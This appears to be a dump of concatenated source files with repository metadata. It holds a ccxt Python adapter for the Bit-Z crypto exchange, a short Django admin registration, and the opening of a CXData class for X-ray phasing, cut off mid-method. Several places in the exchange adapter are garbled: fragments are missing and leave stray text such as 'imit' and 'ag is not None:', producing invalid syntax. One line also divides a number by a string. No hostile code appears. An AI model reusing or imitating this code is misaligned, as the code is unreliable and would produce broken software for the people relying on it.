baseUrl = self.implode_params(self.urls['api'][api], {'hostname': self.hostname})
url = baseUrl + '/' + self.capitalize(api) + '/' + path
query = None
if api == 'market':
query = self.urlencode(params)
if len(query):
url += '?' + query
else:
self.check_required_credentials()
body = self.rawencode(self.keysort(self.extend({
'apiKey': self.apiKey,
'timeStamp': self.seconds(),
'nonce': self.nonce(),
}, params)))
body += '&sign=' + self.hash(self.encode(body + self.secret))
headers = {'Content-type': 'application/x-www-form-urlencoded'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return # fallback to default error handler
status = self.safe_string(response, 'status')
if status is not None:
feedback = self.id + ' ' + body
#
# {"status":-107,"msg":"","data":"","time":1535968848,"microtime":"0.89092200 1535968848","source":"api"}
#
if status == '200':
#
# {"status":200,"msg":"","data":-200031,"time":1535999806,"microtime":"0.85476800 1535999806","source":"api"}
#
code = self.safe_integer(response, 'data')
if code is not None:
self.throw_exactly_matched_exception(self.exceptions, code, feedback)
raise ExchangeError(feedback)
else:
return # no error
self.throw_exactly_matched_exception(self.exceptions, status, feedback)
raise ExchangeError(feedback)
| 41.424466 | 182 | 0.414012 |
ge import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
class bitz(Exchange):
def describe(self):
return self.deep_extend(super(bitz, self).describe(), {
'id': 'bitz',
'name': 'Bit-Z',
'countries': ['HK'],
'rateLimit': 2000,
'version': 'v2',
'userAgent': self.userAgents['chrome'],
'has': {
'cancelOrder': True,
'cancelOrders': True,
'createOrder': True,
'createMarketOrder': False,
'fetchBalance': True,
'fetchDeposits': True,
'fetchClosedOrders': True,
'fetchMarkets': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTransactions': False,
'fetchWithdrawals': True,
'withdraw': True,
},
'timeframes': {
'1m': '1min',
'5m': '5min',
'15m': '15min',
'30m': '30min',
'1h': '60min',
'4h': '4hour',
'1d': '1day',
'5d': '5day',
'1w': '1week',
'1M': '1mon',
},
'hostname': 'apiv2.bitz.com',
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87443304-fec5e000-c5fd-11ea-98f8-ba8e67f7eaff.jpg',
'api': {
'market': 'https://{hostname}',
'trade': 'https://{hostname}',
'assets': 'https://{hostname}',
},
'www': 'https://www.bitz.com',
'doc': 'https://apidoc.bitz.com/en/',
'fees': 'https://www.bitz.com/fee?type=1',
'referral': 'https://u.bitz.com/register?invite_code=1429193',
},
'api': {
'market': {
'get': [
'ticker',
'depth',
'order',
'tickerall',
'kline',
'symbolList',
'getServerTime',
'currencyRate',
'currencyCoinRate',
'coinRate',
],
},
'trade': {
'post': [
'addEntrustSheet',
'cancelEntrustSheet',
'cancelAllEntrustSheet',
'coinOut',
'getUserHistoryEntrustSheet',
'getUserNowEntrustSheet',
'getEntrustSheetInfo',
'depositOrWithdraw',
],
},
'assets': {
'post': [
'getUserAssets',
],
},
},
'fees': {
'trading': {
'maker': 0.002,
'taker': 0.002,
},
'funding': {
'withdraw': {
'BTC': '0.5%',
'DKKT': '0.5%',
'ETH': 0.01,
'USDT': '0.5%',
'LTC': '0.5%',
'FCT': '0.5%',
'LSK': '0.5%',
'HXI': '0.8%',
'ZEC': '0.5%',
'DOGE': '0.5%',
'MZC': '0.5%',
'ETC': '0.5%',
'GXS': '0.5%',
'XPM': '0.5%',
'PPC': '0.5%',
'BLK': '0.5%',
'XAS': '0.5%',
'HSR': '0.5%',
'NULS': 5.0,
'VOISE': 350.0,
'PAY': 1.5,
'EOS': 0.6,
'YBCT': 35.0,
'OMG': 0.3,
'OTN': 0.4,
'BTX': '0.5%',
'QTUM': '0.5%',
'DASH': '0.5%',
'GAME': '0.5%',
'BCH': '0.5%',
'GNT': 9.0,
'SSS': 1500.0,
'ARK': '0.5%',
'PART': '0.5%',
'LEO': '0.5%',
'DGB': '0.5%',
'ZSC': 130.0,
'VIU': 350.0,
'BTG': '0.5%',
'ARN': 10.0,
'VTC': '0.5%',
'BCD': '0.5%',
'TRX': 200.0,
'HWC': '0.5%',
'UNIT': '0.5%',
'OXY': '0.5%',
'MCO': 0.3500,
'SBTC': '0.5%',
'BCX': '0.5%',
'ETF': '0.5%',
'PYLNT': 0.4000,
'XRB': '0.5%',
'ETP': '0.5%',
},
},
},
'precision': {
'amount': 8,
'price': 8,
},
'options': {
'fetchOHLCVVolume': True,
'fetchOHLCVWarning': True,
'lastNonceTimestamp': 0,
},
'commonCurrencies': {
'BOX': 'BOX Token',
'LEO': 'LeoCoin',
'XRB': 'NANO',
'PXC': 'Pixiecoin',
'VTC': 'VoteCoin',
'TTC': 'TimesChain',
},
'exceptions': {
'-102': ExchangeError,
'-103': AuthenticationError,
'-104': ExchangeNotAvailable,
'-105': AuthenticationError,
'-106': ExchangeNotAvailable,
'-109': AuthenticationError,
'-110': DDoSProtection,
'-111': PermissionDenied,
'-112': OnMaintenance,
'-114': RateLimitExceeded,
'-117': AuthenticationError,
'-100015': AuthenticationError,
'-100044': ExchangeError,
'-100101': ExchangeError,
'-100201': ExchangeError,
'-100301': ExchangeError,
'-100401': ExchangeError,
'-100302': ExchangeError,
'-100303': ExchangeError,
'-200003': AuthenticationError,
'-200005': PermissionDenied,
'-200025': ExchangeNotAvailable,
'-200027': InvalidOrder,
'-200028': InvalidOrder,
'-200029': InvalidOrder,
'-200030': InvalidOrder,
'-200031': InsufficientFunds,
'-200032': ExchangeError,
'-200033': ExchangeError,
'-200034': OrderNotFound,
'-200035': OrderNotFound,
'-200037': InvalidOrder,
'-200038': ExchangeError,
'-200055': OrderNotFound,
'-300069': AuthenticationError,
'-300101': ExchangeError,
'-300102': InvalidOrder,
'-300103': AuthenticationError,
'-301001': ExchangeNotAvailable,
},
})
def fetch_markets(self, params={}):
response = self.marketGetSymbolList(params)
markets = self.safe_value(response, 'data')
ids = list(markets.keys())
result = []
for i in range(0, len(ids)):
id = ids[i]
market = markets[id]
numericId = self.safe_string(market, 'id')
baseId = self.safe_string(market, 'coinFrom')
quoteId = self.safe_string(market, 'coinTo')
base = baseId.upper()
quote = quoteId.upper()
base = self.safe_currency_code(base)
quote = self.safe_currency_code(quote)
symbol = base + '/' + quote
precision = {
'amount': self.safe_integer(market, 'numberFloat'),
'price': self.safe_integer(market, 'priceFloat'),
}
result.append({
'info': market,
'id': id,
'numericId': numericId,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': True,
'precision': precision,
'limits': {
'amount': {
'min': self.safe_float(market, 'minTrade'),
'max': self.safe_float(market, 'maxTrade'),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.assetsPostGetUserAssets(params)
balances = self.safe_value(response['data'], 'info')
result = {'info': response}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'name')
code = self.safe_currency_code(currencyId)
account = self.account()
account['used'] = self.safe_float(balance, 'lock')
account['total'] = self.safe_float(balance, 'num')
account['free'] = self.safe_float(balance, 'over')
result[code] = account
return self.parse_balance(result)
def parse_ticker(self, ticker, market=None):
timestamp = None
marketId = self.safe_string(ticker, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
last = self.safe_float(ticker, 'now')
open = self.safe_float(ticker, 'open')
change = None
average = None
if last is not None and open is not None:
change = last - open
average = self.sum(last, open) / 2
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': self.safe_float(ticker, 'bidPrice'),
'bidVolume': self.safe_float(ticker, 'bidQty'),
'ask': self.safe_float(ticker, 'askPrice'),
'askVolume': self.safe_float(ticker, 'askQty'),
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': self.safe_float(ticker, 'priceChange24h'),
'average': average,
'baseVolume': self.safe_float(ticker, 'volume'),
'quoteVolume': self.safe_float(ticker, 'quoteVolume'),
'info': ticker,
}
def parse_microtime(self, microtime):
if microtime is None:
return microtime
parts = microtime.split(' ')
milliseconds = float(parts[0])
seconds = int(parts[1])
total = self.sum(seconds, milliseconds)
return int(total * 1000)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.marketGetTicker(self.extend(request, params))
ticker = self.parse_ticker(response['data'], market)
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.extend(ticker, {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
request = {}
if symbols is not None:
ids = self.market_ids(symbols)
request['symbols'] = ','.join(ids)
response = self.marketGetTickerall(self.extend(request, params))
tickers = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
result = {}
ids = list(tickers.keys())
for i in range(0, len(ids)):
id = ids[i]
ticker = tickers[id]
market = None
if id in self.markets_by_id:
market = self.markets_by_id[id]
ticker = self.parse_ticker(tickers[id], market)
symbol = ticker['symbol']
if symbol is None:
if market is not None:
symbol = market['symbol']
else:
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
if symbol is not None:
result[symbol] = self.extend(ticker, {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
return self.filter_by_array(result, 'symbol', symbols)
def fetch_time(self, params={}):
response = self.marketGetGetServerTime(params)
return self.safe_timestamp(response, 'time')
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
request = {
'symbol': self.market_id(symbol),
}
response = self.marketGetDepth(self.extend(request, params))
orderbook = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.parse_order_book(orderbook, timestamp)
def parse_trade(self, trade, market=None):
id = self.safe_string(trade, 'id')
timestamp = self.safe_timestamp(trade, 'T')
symbol = None
if market is not None:
symbol = market['symbol']
price = self.safe_float(trade, 'p')
amount = self.safe_float(trade, 'n')
cost = None
if price is not None:
if amount is not None:
cost = self.price_to_precision(symbol, amount * price)
side = self.safe_string(trade, 's')
return {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': id,
'order': None,
'type': 'limit',
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
'info': trade,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.marketGetOrder(self.extend(request, params))
return self.parse_trades(response['data'], market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
return [
self.safe_integer(ohlcv, 'time'),
self.safe_float(ohlcv, 'open'),
self.safe_float(ohlcv, 'high'),
self.safe_float(ohlcv, 'low'),
self.safe_float(ohlcv, 'close'),
self.safe_float(ohlcv, 'volume'),
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
duration = self.parse_timeframe(timeframe) * 1000
market = self.market(symbol)
request = {
'symbol': market['id'],
'resolution': self.timeframes[timeframe],
}
if limit is not None:
request['size'] = min(limit, 300)
if since is not None:
request['to'] = self.sum(since, limit * duration * 1000)
else:
if since is not None:
raise ArgumentsRequired(self.id + ' fetchOHLCV requires a limit argument if the since argument is specified')
response = self.marketGetKline(self.extend(request, params))
data = self.safe_value(response, 'data', {})
bars = self.safe_value(data, 'bars', [])
return self.parse_ohlcvs(bars, market, timeframe, since, limit)
def parse_order_status(self, status):
statuses = {
'0': 'open',
'1': 'open',
'2': 'closed',
'3': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
id = self.safe_string(order, 'id')
symbol = None
if market is None:
baseId = self.safe_string(order, 'coinFrom')
quoteId = self.safe_string(order, 'coinTo')
if (baseId is not None) and (quoteId is not None):
marketId = baseId + '_' + quoteId
if marketId in self.markets_by_id:
market = self.safe_value(self.markets_by_id, marketId)
else:
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
if market is not None:
symbol = market['symbol']
side = self.safe_string(order, 'flag')
if side is not None:
side = 'sell' if (side == 'sale') else 'buy'
price = self.safe_float(order, 'price')
amount = self.safe_float(order, 'number')
remaining = self.safe_float(order, 'numberOver')
filled = self.safe_float(order, 'numberDeal')
timestamp = self.safe_integer(order, 'timestamp')
if timestamp is None:
timestamp = self.safe_timestamp(order, 'created')
cost = self.safe_float(order, 'orderTotalPrice')
if price is not None:
if filled is not None:
cost = filled * price
status = self.parse_order_status(self.safe_string(order, 'status'))
return {
'id': id,
'clientOrderId': None,
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': 'limit',
'side': side,
'price': price,
'cost': cost,
'amount': amount,
'filled': filled,
'remaining': remaining,
'trades': None,
'fee': None,
'info': order,
'average': None,
}
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
if type != 'limit':
raise ExchangeError(self.id + ' createOrder allows limit orders only')
market = self.market(symbol)
orderType = '1' if (side == 'buy') else '2'
if not self.password:
raise ExchangeError(self.id + ' createOrder() requires you to set exchange.password = "YOUR_TRADING_PASSWORD"(a trade password is NOT THE SAME as your login password)')
request = {
'symbol': market['id'],
'type': orderType,
'price': self.price_to_precision(symbol, price),
'number': self.amount_to_precision(symbol, amount),
'tradePwd': self.password,
}
response = self.tradePostAddEntrustSheet(self.extend(request, params))
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
order = self.extend({
'timestamp': timestamp,
}, response['data'])
return self.parse_order(order, market)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'entrustSheetId': id,
}
response = self.tradePostCancelEntrustSheet(self.extend(request, params))
return response
def cancel_orders(self, ids, symbol=None, params={}):
self.load_markets()
request = {
'ids': ','.join(ids),
}
response = self.tradePostCancelEntrustSheet(self.extend(request, params))
return response
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'entrustSheetId': id,
}
response = self.tradePostGetEntrustSheetInfo(self.extend(request, params))
return self.parse_order(response['data'])
def fetch_orders_with_method(self, method, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOpenOrders requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'coinFrom': market['baseId'],
'coinTo': market['quoteId'],
imit
if since is not None:
request['startTime'] = int(since / 1000)
response = getattr(self, method)(self.extend(request, params))
orders = self.safe_value(response['data'], 'data', [])
return self.parse_orders(orders, None, since, limit)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserNowEntrustSheet', symbol, since, limit, params)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
def parse_transaction_status(self, status):
statuses = {
'1': 'pending',
'2': 'pending',
'3': 'pending',
'4': 'ok',
'5': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
timestamp = self.safe_integer(transaction, 'updated')
if timestamp == 0:
timestamp = None
currencyId = self.safe_string(transaction, 'coin')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'type')
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
fee = None
feeCost = self.safe_float(transaction, 'network_fee')
if feeCost is not None:
fee = {
'cost': feeCost,
'code': code,
}
return {
'id': self.safe_string(transaction, 'id'),
'txid': self.safe_string(transaction, 'txid'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': self.safe_string(transaction, 'wallet'),
'tag': self.safe_string(transaction, 'memo'),
'type': type,
'amount': self.safe_float(transaction, 'number'),
'currency': code,
'status': status,
'updated': timestamp,
'fee': fee,
'info': transaction,
}
def parse_transactions_by_type(self, type, transactions, code=None, since=None, limit=None):
result = []
for i in range(0, len(transactions)):
transaction = self.parse_transaction(self.extend({
'type': type,
}, transactions[i]))
result.append(transaction)
return self.filter_by_currency_since_limit(result, code, since, limit)
def parse_transaction_type(self, type):
types = {
'deposit': 1,
'withdrawal': 2,
}
return self.safe_integer(types, type, type)
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_for_type('deposit', code, since, limit, params)
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_for_type('withdrawal', code, since, limit, params)
def fetch_transactions_for_type(self, type, code=None, since=None, limit=None, params={}):
if code is None:
raise ArgumentsRequired(self.id + ' fetchTransactions() requires a currency `code` argument')
self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'type': self.parse_transaction_type(type),
}
if since is not None:
request['startTime'] = int(since / str(1000))
if limit is not None:
request['page'] = 1
request['pageSize'] = limit
response = self.tradePostDepositOrWithdraw(self.extend(request, params))
transactions = self.safe_value(response['data'], 'data', [])
return self.parse_transactions_by_type(type, transactions, code, since, limit)
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'number': self.currency_to_precision(code, amount),
'address': address,
ag is not None:
request['memo'] = tag
response = self.tradePostCoinOut(self.extend(request, params))
data = self.safe_value(response, 'data', {})
return self.parse_transaction(data, currency)
def nonce(self):
currentTimestamp = self.seconds()
if currentTimestamp > self.options['lastNonceTimestamp']:
self.options['lastNonceTimestamp'] = currentTimestamp
self.options['lastNonce'] = 100000
self.options['lastNonce'] = self.sum(self.options['lastNonce'], 1)
return self.options['lastNonce']
def sign(self, path, api='market', method='GET', params={}, headers=None, body=None):
baseUrl = self.implode_params(self.urls['api'][api], {'hostname': self.hostname})
url = baseUrl + '/' + self.capitalize(api) + '/' + path
query = None
if api == 'market':
query = self.urlencode(params)
if len(query):
url += '?' + query
else:
self.check_required_credentials()
body = self.rawencode(self.keysort(self.extend({
'apiKey': self.apiKey,
'timeStamp': self.seconds(),
'nonce': self.nonce(),
}, params)))
body += '&sign=' + self.hash(self.encode(body + self.secret))
headers = {'Content-type': 'application/x-www-form-urlencoded'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
status = self.safe_string(response, 'status')
if status is not None:
feedback = self.id + ' ' + body
if status == '200':
code = self.safe_integer(response, 'data')
if code is not None:
self.throw_exactly_matched_exception(self.exceptions, code, feedback)
raise ExchangeError(feedback)
else:
return
self.throw_exactly_matched_exception(self.exceptions, status, feedback)
raise ExchangeError(feedback)
| true | true |
f72321b2ef93ed9a3701ed57a938c91891a936c2 | 117 | py | Python | events/admin.py | iosoftworks/locale-backend-v2 | bc162ca2ccdf1454c9d25c51a477abe3f4dce665 | [
"MIT"
] | null | null | null | events/admin.py | iosoftworks/locale-backend-v2 | bc162ca2ccdf1454c9d25c51a477abe3f4dce665 | [
"MIT"
] | 4 | 2021-03-19T01:37:07.000Z | 2021-06-10T18:55:35.000Z | events/admin.py | iosoftworks/locale-backend-v2 | bc162ca2ccdf1454c9d25c51a477abe3f4dce665 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Event
# Register your models here.
admin.site.register(Event) | 16.714286 | 32 | 0.794872 | from django.contrib import admin
from .models import Event
admin.site.register(Event) | true | true |
f7232356adc5d775fcd3a8d9bee655b6f40c630d | 40,789 | py | Python | cxphasing/CXData.py | jbgastineau/cxphasing | a9847a0afb9a981d81f027e75c06c9bb2b531d33 | [
"MIT"
] | 3 | 2018-05-11T16:05:55.000Z | 2021-12-20T08:52:02.000Z | cxphasing/CXData.py | jbgastineau/cxphasing | a9847a0afb9a981d81f027e75c06c9bb2b531d33 | [
"MIT"
] | null | null | null | cxphasing/CXData.py | jbgastineau/cxphasing | a9847a0afb9a981d81f027e75c06c9bb2b531d33 | [
"MIT"
] | 2 | 2018-11-14T08:57:10.000Z | 2021-12-20T08:52:06.000Z | """
.. module:: CXData2.py
:platform: Unix
:synopsis: A class for coherent X-ray phasing data.
.. moduleauthor:: David Vine <djvine@gmail.com>
"""
import scipy as sp
import numpy as np
import scipy.fftpack as spf
import scipy.ndimage as spn
from numpy.random import uniform
from numpy import pad
import os
import pdb
import pylab
import shutil
import sys
import operator
from round_scan import round_roi
import glob
import multiprocessing as mp
import time
from matplotlib import cm
from images2gif import writeGif
from CXFileReader import CXFileReader
from cxparams import CXParams as CXP
debug = True
def fft2(x):
# Wrapped for fft2 that handles CXData objects and ndarrays
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(spf.fft2(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(fft2(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return spf.fft2(x)
else:
raise Exception('Unknown data type passed to fft2')
def ifft2(x):
# Wrapped for ifft2 that handles CXData objects
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(spf.ifft2(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(ifft2(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return spf.ifft2(x)
else:
raise Exception('Unknown data type passed to ifft2')
def fftshift(x):
# Wrapper for fftshift that handles CXData objects
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(spf.fftshift(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return spf.fftshift(x)
else:
raise Exception('Unknown data type passed to fftshift')
def abs(x):
# Wrapper for abs that handles CXData objects
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(np.abs(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(abs(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return np.abs(x)
else:
raise Exception('Unknown data type passed to abs')
def angle(x):
# Wrapper for angle that handles CXData objects
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.angle(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return sp.angle(x)
else:
raise Exception('Unknown data type passed to angle')
def exp(x):
# Wrapper for exp that handles CXData objects
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.exp(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return sp.exp(x)
else:
raise Exception('Unknown data type passed to exp')
def log(x):
# Wrapper for exp that handles CXData objects
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.log(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return sp.log(x)
else:
raise Exception('Unknown data type passed to log')
def conj(x):
"""
Wrapper for conjugate on a CXData object.
"""
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.conj(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(conj(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return sp.conj(x)
else:
raise Exception('Unknown data type passed to conj')
def sqrt(x):
"""
Wrapper for square root on a CXData object.
"""
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.sqrt(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(exp(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, (int, float, complex, np.ndarray)):
return sp.sqrt(x)
else:
raise Exception('Unknown data type passed to sqrt')
def sum(x):
"""
Sum over arrays.
"""
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
if i==0:
l.append(x.data[0])
else:
l[0] += x.data[i]
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(self.modes)):
l.append(sum(self.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return sp.sum(x)
else:
raise Exception('Unknown data type pass to sum')
def worker(func):
def worker2(self=None, *args, **kwargs):
try:
kwargs['no_decorate']
return func(self, args[0], args[1], args[2], args[3], args[4], args[5])
except KeyError:
cnt = 0
jobs, results = args[0], args[1]
while True:
job_args = jobs.get()
if job_args[0]==None: # Deal with Poison Pill
print '{}: Exiting. {:d} jobs completed.'.format(mp.current_process().name, cnt)
jobs.task_done()
break
if job_args[0]%np.floor(job_args[1]/10)==0:
print 'Processed {:d} out of {:d} files.'.format(job_args[0], job_args[1])
res = func(self, *job_args)
cnt+=1
jobs.task_done()
results.put(res)
return worker2
return worker2
class CXData(CXFileReader):
"""
Defines a class for holding and interacting with coherent x-ray data.
...
Attributes
----------
data: list
list of complex arrays that hold all of the phase retrieval data.
name: str
name of instance. Used for logging.
savepath: str
location where this data should be saved.
Methods
-------
"""
def __init__(self, *args, **kwargs):
self.data = None
self.savepath = None
for kw in kwargs:
# Data attribute must be a list of arrays
if kw=='data':
if isinstance(kwargs['data'], list):
self.data = kwargs['data']
elif isinstance(kwargs['data'], np.ndarray):
self.data = [kwargs['data']]
else:
setattr(self, kw, kwargs[kw])
def __repr__(self):
try:
s=repr(self.data[0])
except:
s=''
try:
return '<{} at {}>\n{} arrays ({:d}x{:d}px).\n{}'.format(self.__class__,
hex(id(self)), len(self.data), self.data[0].shape[0], self.data[0].shape[1], s)
except AttributeError:
return '<{} at {}>\nNo data attribute present.'.format(self.__class__, hex(id(self)))
def __add__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]+other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]+other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__add__(other, self)
def __iadd__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]+=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]+=other
return self
elif isinstance(other, CXModal):
raise("The meaning of += is ambiguous for these datatypes")
def __sub__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]-other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]-other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__sub__(other, self)*-1.0
def __isub__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]-=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]-=other.data
return self
elif isinstance(other, CXModal):
raise("The meaning of -= is ambiguous for these datatypes")
def __pow__(self, power):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]**power)
return CXData(data=l)
def __mul__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]*other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]*other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__mul__(other, self)
def __rmul__(self, other):
return self.__mul__(other)
def __imul__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]*=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]*=other
return self
elif isinstance(other, CXModal):
raise("The meaning of *= is ambiguous for these datatypes")
def __div__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]/other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]/other)
return CXData(data=l)
elif isinstance(other, CXModal):
raise("The meaning of / is ambiguous for these datatypes")
def __rdiv__(self, other):
return self.__mul__(other)
def __idiv__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]/=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]/=other
return self
elif isinstance(other, CXModal):
raise("The meaning of /= is ambiguous for these datatypes")
def __len__(self):
return len(self.data)
def __del__(self):
# Remove this instance from the CXData __all__ variable
try:
print 'Deleting {}'.format(self.kwargs['itype'])
CXData.__all__.pop(self.kwargs['itype'])
except (AttributeError, KeyError):
pass
def __getitem__(self, s):
"""
Allows extracting a subarray from self.data or a single array from a list of arrays.
Implements subpixel shifting for seamless indexing of a fractional number of pixels.
The returned array must be an integer number of pixels.
E.g a[0:100.6] doesn't make any sense
but a[0.6:100.6] does.
a[0] is equivalent to a.data[0]
"""
if isinstance(s, int):
return CXData(data=self.data[s])
else:
y, x = s
xstart = x.start or 0
xstop = x.stop or self.data[0].shape[0]-1
ystart = y.start or 0
ystop = y.stop or self.data[0].shape[1]-1
dx, dy = -np.mod(xstart, 1), -np.mod(ystart, 1)
l = []
for data in self.data:
